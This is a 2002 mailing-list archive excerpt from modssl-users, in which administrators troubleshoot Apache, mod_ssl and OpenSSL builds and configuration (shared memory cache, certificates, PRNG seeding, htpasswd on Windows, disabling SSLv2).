httpd.conf file about the SSLSessionCache option. The error is:

SSLSessionCache: shared memory cache not useable on this platform

Well, it was with openssl 0.9.6c. I didn't do anything different in my
installation steps which were:

install openssl

configure mm with disable-shared
make

configure mod_ssl --with-apache=../apache_1.3.26

install mod_perl (perl Makefile.PL APACHE_SRC=../apache_1.3.26/src
DO_HTTPD=0 USE_APACI=1 PREP_HTTPD=1 EVERYTHING=1)

set SSL_BASE and EAPI_MM variables to ../openssl0.9.6e and ../mm-1.2.1

configure and install apache:

./configure --enable-module=proxy --enable-module=so
--activate-module=src/modules/perl/libperl.a --enable-module=perl
--enable-rule=SHARED_CORE --enable-module=ssl

make

make certificate

make install



Without the shared option in the config file, apache starts just fine, but
it won't work with:

SSLSessionCache        shm:/usr/local/apache/logs/ssl/ssl_scache(512000)

It worked before.

What did I break?


Dave Lowenstein
Programmer/Analyst
Instructional Technology Services
San Diego State University
(619)594-0270
http://www-rohan.sdsu.edu/dept/its

On Wed, 31 Jul 2002, Matt Nelson wrote:

> At 06:02 PM 7/31/2002 +0200, you wrote:
> >See comments,
> 
> Ditto,
> 
> >Rgds,
> >
> >Owen Boyle
> >
> > >-----Original Message-----
> > >From: Matt Nelson [mailto:matt@nelsonprinting.com]
> > >Sent: Mittwoch, 31. Juli 2002 17:01
> > >To: modssl-users@modssl.org
> > >Subject: RE: Error message help
> > >
> > >
> > >Well I may have figured this out, https is now running, cert
> > >was in the wrong place,
> >
> >..or your SSLCertificateFile directive was pointing to the wrong place :-)
> 
> Yup, but dang I was confused on where it went.  Everything I've read said 
> put it somewhere different.  Error logs are you friends.
> 
> 
> > > ...but https returns the default web page for the apache
> > >installation, instead of the real site, which does come up with just
> > >http.  I think I can figure that out, but if anyone has pointer
> > >thanks,  and thanks for suffering my dumb questions.
> >
> >Check out your DocumentRoot directive in the SSL virtual host - there 
> >should only be one. If there is more than one, apache will use the last 
> >one... It is this directive which tells apache where to fetch the content.
> 
> Yeah I found that right after I wrote that.
> 
> > >
> > >--
> > >Matt
> > >
> > >
> > >At 09:36 AM 7/31/2002 -0500, you wrote:
> > >>At 03:56 PM 7/31/2002 +0200, you wrote:
> > >>> >From: Matt Nelson [mailto:matt@nelsonprinting.com]
> > >>> >
> > >>> >Now, the error I'm getting now  that I can't seem to find any
> > >>> >help on, in
> > >>> >the error_log is:
> > >>> >
> > >>> >OpenSSL: error:0D06B078:asn1 encoding
> > >routines:ASN1_get_object:header
> > >>> too long
> > >>> >
> > >>>
> > >>>Unusual.. Do you see anything in the browser? Also:
> > >>>
> > >>>- What versions of apache, mod_ssl, openssl?
> > >>
> > >>
> > >>Apache 1.3.22
> > >>OpenSSL 0.9.6
> > >>mod_ssl 1.4
> >
> >Um... If I were you, I'd get apache 1.3.26, OpenSSL 0.9.6e and mod_ssl 
> >2.8.10. That's teh latest mix, also pay attention to the security advisory 
> >that was posted to the list today.
> 
> I'll do that.
> 
> 
> > >>
> > >>>- Static or DSO?
> >
> >When you compiled apache, did you statically compile in mod_ssl (i.e. 
> >--enable-module=ssl) so that the mod_ssl binary gets munged in with the 
> >apache binary to produce a big binary *or* did you compile mod_ssl as a 
> >shared object which would be loaded dynamically at runtime (DSO = Dynamic 
> >Shared Object), i.e. --enable-shared=ssl? Usually, it doesn't make much 
> >difference when they're working, but since yours was not working, I 
> >thought I'd ask.
> 
> I didn't compile, I used everything stock from the Caldera 3.11 server 
> install. A bad idea now I know, if I'd done it on my own or recompiled, I'd 
> know which it was, among other things.
> 
> > >>
> > >>
> > >>I'll be honest and say I don't quite understand that
> > >question.  I'm way
> > >>more new at this what I wished.  I could probably answer that
> > >question, if
> > >>asked in different terms.
> > >>
> > >>>- What browser?
> > >>
> > >>IE, Mozilla, you name it.
> >
> >Just in case it was a funny browser - SSL is as much to do with the client 
> >as it is to do with the server so it is essential to verify any problems 
> >with several browsers. But you've already done that.
> 
> Yeah...  See I do try, I hate being a clueless newbie, or at least acting 
> like one.  I always try to cover the bases myself, so I don't get RTFM 
> responses.  I'm sure I'll have some other questions, though, and soon.
> 
> Thanks much
> 
> --
> Matt
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 22:51:37 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA25314; Wed, 31 Jul 2002 22:51:02 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail1.expertrade.com id WAA25177; Wed, 31 Jul 2002 22:50:05 +0200 (MET DST)
Received: from reggae (reggae.expertrade.com [216.122.43.90])
	by mail1.expertrade.com (8.9.3/8.9.3) with ESMTP id NAA08940
	for ; Wed, 31 Jul 2002 13:50:03 -0700
Message-ID: <000b01c238d3$d7e8ac40$5a2b7ad8@expertrade.com>
From: "David Wall" 
To: 
References: 
Subject: Re: MM doesn't work now with 0.9.6e
Date: Wed, 31 Jul 2002 13:50:02 -0700
Organization: Yozons, Inc.
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David Wall" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> configure mod_ssl --with-apache=../apache_1.3.26

Seems like you need to supply mod_ssl with all of the configure directives
you show below for apache, and then when it comes time to compile apache,
you just run the auto-generated config.status script.  At least that worked
for me using the same versions you are using (under Red Hat Linux).  Of
course, I don't have mod_perl, so that may make a difference...

>
> install mod_perl (perl Makefile.PL APACHE_SRC=../apache_1.3.26/src
> DO_HTTPD=0 USE_APACI=1 PREP_HTTPD=1 EVERYTHING=1)
>
> set SSL_BASE and EAPI_MM variables to ../openssl0.9.6e and ../mm-1.2.1
>
> configure and install apache:
>
> ./configure --enable-module=proxy --enable-module=so
> --activate-module=src/modules/perl/libperl.a --enable-module=perl
> --enable-rule=SHARED_CORE --enable-module=ssl
>
> make
>
> make certificate
>
> make install


David

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 31 23:07:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA26229; Wed, 31 Jul 2002 23:06:57 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.sdsu.edu id XAA26128; Wed, 31 Jul 2002 23:04:11 +0200 (MET DST)
Received: from localhost (dlowenst@localhost)
	by mail.sdsu.edu (8.11.4/8.11.4) with ESMTP id g6VL44909797
	for ; Wed, 31 Jul 2002 14:04:04 -0700 (PDT)
Date: Wed, 31 Jul 2002 14:04:03 -0700 (PDT)
From: David Lowenstein 
To: modssl-users@modssl.org
Subject: Re: MM doesn't work now with 0.9.6e
In-Reply-To: <000b01c238d3$d7e8ac40$5a2b7ad8@expertrade.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David Lowenstein 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm an idiot. I set the EAPI_MM variable as MM_EAPI. Dyslexia gets you
every time.

Thanks

Dave

Dave Lowenstein
Programmer/Analyst
Instructional Technology Services
San Diego State University
(619)594-0270
http://www-rohan.sdsu.edu/dept/its

On Wed, 31 Jul 2002, David Wall wrote:

> > configure mod_ssl --with-apache=../apache_1.3.26
> 
> Seems like you need to supply mod_ssl with all of the configure directives
> you show below for apache, and then when it comes time to compile apache,
> you just run the auto-generated config.status script.  At least that worked
> for me using the same versions you are using (under Red Hat Linux).  Of
> course, I don't have mod_perl, so that may make a difference...
> 
> >
> > install mod_perl (perl Makefile.PL APACHE_SRC=../apache_1.3.26/src
> > DO_HTTPD=0 USE_APACI=1 PREP_HTTPD=1 EVERYTHING=1)
> >
> > set SSL_BASE and EAPI_MM variables to ../openssl0.9.6e and ../mm-1.2.1
> >
> > configure and install apache:
> >
> > ./configure --enable-module=proxy --enable-module=so
> > --activate-module=src/modules/perl/libperl.a --enable-module=perl
> > --enable-rule=SHARED_CORE --enable-module=ssl
> >
> > make
> >
> > make certificate
> >
> > make install
> 
> 
> David
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 01:49:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA07834; Thu, 1 Aug 2002 01:48:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from rdsl_mlb_mx1.requestdsl.com.au id BAA07825; Thu, 1 Aug 2002 01:47:56 +0200 (MET DST)
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: Apache on Win2000
Date: Thu, 1 Aug 2002 09:46:49 +1000
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B5935B6CD@rdsl_mlb_mx1.requestdsl.com.au>
Thread-Topic: Error message help
Thread-Index: AcI4o5zUZd13a94WQRKAw0Zussn7JQABlTAQAA/gDvA=
From: "Vince Montuoro" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id BAA07831
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I've had difficulties in the past recompiling apache, modssl and openSSL on a Windows server, can someone please upload the new openSSL_0.9.6e,Mod_SSL_2.8.10, apache 1.26 aware zip please to modsll contribution page?
eg Apache_1.3.26-Mod_SSL_2.8.10-OpenSSL_0.9.6e-Win32.zip

(actually i think all i need is the following files ssleay32.dll and libeay32.dll to get OpenSSL upgraded)

If anyone has any sure method of compiling on Windows server please inform.



Kind thanks 
Vince

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 03:07:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA13666; Thu, 1 Aug 2002 03:06:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA13654; Thu, 1 Aug 2002 03:05:50 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id AB5DC4CE76C; Thu,  1 Aug 2002 03:05:48 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id CB1E02886B; Wed, 31 Jul 2002 21:11:25 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from decision.gsfc.nasa.gov id TAA13328; Wed, 31 Jul 2002 19:46:34 +0200 (MET DST)
Received: from localhost ([127.0.0.1] helo=gsfc.nasa.gov)
	by decision.gsfc.nasa.gov with esmtp (Exim 3.12 #1 (Debian))
	id 17ZxYP-0004h9-00
	for ; Wed, 31 Jul 2002 13:46:33 -0400
Message-ID: <3D482278.6AF1F5CB@gsfc.nasa.gov>
Date: Wed, 31 Jul 2002 13:46:32 -0400
From: Nick Burke 
Organization: Code 931
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.2.20 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Help configuring Virutal Hosts
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nick Burke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

To anyone -

I am attempting to setup Apache-SSL on a large server where most access
is thru normal
port 80 communications but I have three VirtualHosts that require port
443 SSL communications.
We have our certificate (via Thawte). I've tried the port and
SSLEnable/SSLDisable directives
inside the VH definitions but it hangs our server.... Any thoughts?

Nick Burke
GSFC/NASA
nick.burke@gsfc.nasa.gov

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 03:07:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA13712; Thu, 1 Aug 2002 03:06:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA13649; Thu, 1 Aug 2002 03:05:49 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 700D94CE74F; Thu,  1 Aug 2002 03:05:48 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D54D52882E; Wed, 31 Jul 2002 21:11:10 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.ANTIMOUSE.COM id TAA11428; Wed, 31 Jul 2002 19:10:06 +0200 (MET DST)
Received: from localhost (benn@localhost)
	by www.ANTIMOUSE.COM (8.9.3/8.9.3) with ESMTP id KAA11772
	for ; Wed, 31 Jul 2002 10:10:09 -0700
Date: Wed, 31 Jul 2002 10:10:08 -0700 (PDT)
From: cbenn 
To: modssl-users@modssl.org
Subject: PRNG errors
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: cbenn 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello everyone.

I just upgraded my OpenSSL yesterday from 9.6c to 9.6e, then recompiled my
mod_ssl-2.8.10-1.3.26 and Apache on OpenBSD 3.0. Everything seemed to go
fine, but now all my https request are unable to connect. According to all
the docs I've seen the error message suggest changing the "SSLRandomSeed"
setting in the httpd.conf, however I've tried various setting, see the new
value for the "Seeding PRNG" line in the log, but the handshake still
fails with the same error message. Can anyone suggest anything else that
maybe the issue.

Thanks,
benn

####From httpd.conf####
#   Pseudo Random Number Generator (PRNG):
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

####From ssl_engine_log####
[31/Jul/2002 09:49:00 30490] [info]  Connection to child 3 established
(server www.host.com:443, client 127.0.0.1)
[31/Jul/2002 09:49:00 30490] [info]  Seeding PRNG with 1160 bytes of
entropy
[31/Jul/2002 09:49:00 30490] [error] SSL handshake failed (server
www.host.com:443, client 127.0.0.1) (OpenSSL library error follows)
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:24064064:random number
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:24064064:random number
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:24064064:random number
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[31/Jul/2002 09:49:00 30490] [error] OpenSSL: error:1409B005:SSL
routines:SSL3_SEND_SERVER_KEY_EXCHANGE:bad asn1 object header
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 03:07:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA13715; Thu, 1 Aug 2002 03:06:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA13656; Thu, 1 Aug 2002 03:05:51 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C01AA4CE76E; Thu,  1 Aug 2002 03:05:48 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A50B528847; Wed, 31 Jul 2002 21:11:28 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from postman.eglin.af.mil id TAA13889; Wed, 31 Jul 2002 19:59:32 +0200 (MET DST)
Received: from filter1.eglin.af.mil (filter1.eglin.af.mil [129.61.2.39])
	by postman.eglin.af.mil (8.12.2/8.12.2) with SMTP id g6VHx6ta012592
	for ; Wed, 31 Jul 2002 12:59:23 -0500 (CDT)
Received: from filter1.eglin.af.mil ([129.61.2.39])
 by filter1.eglin.af.mil (NAVGW 2.5.1.19) with SMTP id M2002073112592114166
 for ; Wed, 31 Jul 2002 12:59:21 -0500
Received: FROM hub2.eglin.af.mil BY filter1.eglin.af.mil ; Wed Jul 31 12:59:21 2002 -0500
Received: by hub2.eglin.af.mil with Internet Mail Service (5.5.2653.19)
	id <35CXANSM>; Wed, 31 Jul 2002 12:58:06 -0500
Message-ID: <6A03DF6AF8C44947A94DC1FC8C7C431F292A9E@mail09b.eglin.af.mil>
From: Cagle Larence G Contr 96 CG/SCTOA 
To: "'modssl-users@modssl.org'" 
Subject: HTPASSWD Utility
Date: Wed, 31 Jul 2002 12:59:20 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C238BB.FEFC69B0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cagle Larence G Contr 96 CG/SCTOA 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C238BB.FEFC69B0
Content-Type: text/plain

The htpasswd.exe utility in Apache_2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32.zip
aborts with an error message when you try to add or update a password.  It
responds with "The process cannot access the file because it is being used
by another process".  I thought perhaps that Apache had not closed the
password file when it was started, so I stopped the tasks related to Apache
and tried it again.  Same result.  I'm running the server on a PC with
Windows XP Professional OS.

 

I downloaded and unzipped htpasswd.exe from the
Apache_2.0.37-dev_mod_ssl_2.0.37_dev_OpenSSL-0.9.6c-WIN32.zip file and it
works like it used to in earlier versions.

 

Any ideas?

 


------_=_NextPart_001_01C238BB.FEFC69B0
Content-Type: text/html



















The htpasswd.exe utility in
Apache_2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32.zip aborts with an error message
when you try to add or update a password.  It responds with "The
process cannot access the file because it is being used by another
process".  I thought perhaps that Apache had not closed the password
file when it was started, so I stopped the tasks related to Apache and tried it
again.  Same result.  I'm running the server on a PC with Windows XP
Professional OS.



 



I downloaded and unzipped htpasswd.exe from the
Apache_2.0.37-dev_mod_ssl_2.0.37_dev_OpenSSL-0.9.6c-WIN32.zip file and it works
like it used to in earlier versions.



 



Any ideas?



 









------_=_NextPart_001_01C238BB.FEFC69B0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 05:57:47 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id FAA24616; Thu, 1 Aug 2002 05:56:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from enroque.rawbyte.com id FAA24585; Thu, 1 Aug 2002 05:56:00 +0200 (MET DST)
Received: by enroque.rawbyte.com (Postfix, from userid 501)
	id A27FD254EE; Wed, 31 Jul 2002 20:46:24 -0700 (PDT)
Date: Wed, 31 Jul 2002 20:46:24 -0700
From: Daniel Lopez 
To: modssl-users@modssl.org
Subject: Re: HTPASSWD Utility
Message-ID: <20020801034624.GB12097@rawbyte.com>
References: <6A03DF6AF8C44947A94DC1FC8C7C431F292A9E@mail09b.eglin.af.mil>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <6A03DF6AF8C44947A94DC1FC8C7C431F292A9E@mail09b.eglin.af.mil>
User-Agent: Mutt/1.3.28i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Lopez 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



       

On Wed, Jul 31, 2002 at 12:59:20PM -0500, Cagle Larence G Contr 96 CG/SCTOA wrote:
> The htpasswd.exe utility in Apache_2.0.39-Mod_SSL-OpenSSL-0.9.6d-Win32.zip
> aborts with an error message when you try to add or update a password.  It
> responds with "The process cannot access the file because it is being used
> by another process".  I thought perhaps that Apache had not closed the
> password file when it was started, so I stopped the tasks related to Apache
> and tried it again.  Same result.  I'm running the server on a PC with
> Windows XP Professional OS.
> 
>  
> 
> I downloaded and unzipped htpasswd.exe from the
> Apache_2.0.37-dev_mod_ssl_2.0.37_dev_OpenSSL-0.9.6c-WIN32.zip file and it
> works like it used to in earlier versions.

The htpasswd.exe utility on Windows has known bugs that have been fixed for
2.0.40  You can use previous versions like the one you mention, they are ok.

Cheers

Daniel

--
Teach Yourself Apache 2 -- http://apacheworld.org/ty24/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 09:32:33 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07093; Thu, 1 Aug 2002 09:31:35 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA07056; Thu, 1 Aug 2002 09:31:02 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 33E744CE77A; Thu,  1 Aug 2002 09:30:56 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C43062886B; Thu,  1 Aug 2002 07:06:24 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mighty.grot.org id DAA15230; Thu, 1 Aug 2002 03:25:21 +0200 (MET DST)
Received: by mighty.grot.org (Postfix, from userid 515)
	id EEFFD5D1F; Wed, 31 Jul 2002 18:25:09 -0700 (PDT)
Date: Wed, 31 Jul 2002 18:25:09 -0700
From: Aditya 
To: modssl-users@modssl.org
Subject: turning of SSL v2 in modssl
Message-ID: <20020801012509.GA82376@mighty.grot.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aditya 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Is it sufficient to change:

 +SSLv2

to 

 -SSLv2

in SSLCipherSuite to disable SSLv2 in modssl? Is that enough to at least
temporarily limit the exposure to the latest openssl vulnerability while I
upgrade multiple machines?

Thanks,
Adi
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 09:32:41 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07105; Thu, 1 Aug 2002 09:31:45 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA07058; Thu, 1 Aug 2002 09:31:02 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id D8F564CE770; Thu,  1 Aug 2002 09:30:55 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C7BCA2885C; Thu,  1 Aug 2002 07:05:33 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id WAA22056; Wed, 31 Jul 2002 22:02:20 +0200 (MET DST)
Date: Wed, 31 Jul 2002 22:02:20 +0200 (MET DST)
Message-Id: <200207312002.WAA22056@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] mod_ssl assumes SSL_BASE to be /usr/local/ssl if the directory exists (PR#739)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: CJ
Version: mod_ssl-2.8.10-1.3.26
OS: FreeBSD 4.6-STABLE
Submission from: (NULL) (216.17.129.22)


In the file pkg.sslmod/libssl.module there is the following code:

        if [ ".$SSL_BASE" = . ]; then
            if [ -d /usr/local/ssl ]; then
                SSL_BASE="/usr/local/ssl"
            else
                SSL_BASE="SYSTEM"
            fi
        fi

Which makes a rather large assumption that just because you have the directory
/usr/local/ssl your OpenSSL libraries are installed there.  This can throw you
for a loop if you're not expecting it (like I wasn't).

- C.J.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 09:32:43 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07108; Thu, 1 Aug 2002 09:31:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA07051; Thu, 1 Aug 2002 09:31:01 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 73D524CE755; Thu,  1 Aug 2002 09:30:55 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 6AA7C2870F; Thu,  1 Aug 2002 07:04:46 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ntexchange.qfa.quinnfable.com id UAA15157; Wed, 31 Jul 2002 20:14:29 +0200 (MET DST)
content-class: urn:content-classes:message
Subject: Regarding mod_ssl version which suits apache 2.0.39
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Date: Wed, 31 Jul 2002 14:14:21 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
Message-ID: 
Thread-Topic: Regarding mod_ssl version which suits apache 2.0.39
Thread-Index: AcI4vhf7Jdl6jP60Sd+yijJZkjIY8Q==
From: "Venkat Reddy Valluri" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id UAA15232
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Venkat Reddy Valluri" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
  Can you please let me know  where exactly i can get the suitable mod_ssl version which suits for apache 2.0.39, I tried to find out in www.modssl.org, but found out only the mod_ssl_2.8.10-1.3.26 which suits for apache 1.3.26, 

Any help greatly apprecited
 

Thks
Venkata Reddy V
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  1 09:32:51 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA07123; Thu, 1 Aug 2002 09:32:06 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id JAA07052; Thu, 1 Aug 2002 09:31:01 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CA2804CE76E; Thu,  1 Aug 2002 09:30:55 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id ED8042870F; Thu,  1 Aug 2002 07:05:17 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from main.gmane.org id VAA20224; Wed, 31 Jul 2002 21:30:42 +0200 (MET DST)
Received: from root by main.gmane.org with local (Exim 3.33 #1 (Debian))
	id 17ZzAZ-0005Kt-00
	for ; Wed, 31 Jul 2002 21:30:03 +0200
To: modssl-users@modssl.org
X-Injected-Via-Gmane: http://gmane.org/
Received: from news by main.gmane.org with local (Exim 3.33 #1 (Debian))
	id 17Zz2u-0004yV-00
	for ; Wed, 31 Jul 2002 21:22:08 +0200
Path: not-for-mail
From: Aditya 
Newsgroups: gmane.comp.apache.mod-ssl.user
Subject: temporary workaround for most recent openssl remote exploit?
Date: Wed, 31 Jul 2002 12:22:40 -0700
Organization: Grot Free
Lines: 23
Message-ID: 
NNTP-Posting-Host: mighty.grot.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Trace: main.gmane.org 1028143328 11668 204.182.56.120 (31 Jul 2002 19:22:08 GMT)
X-Complaints-To: usenet@main.gmane.org
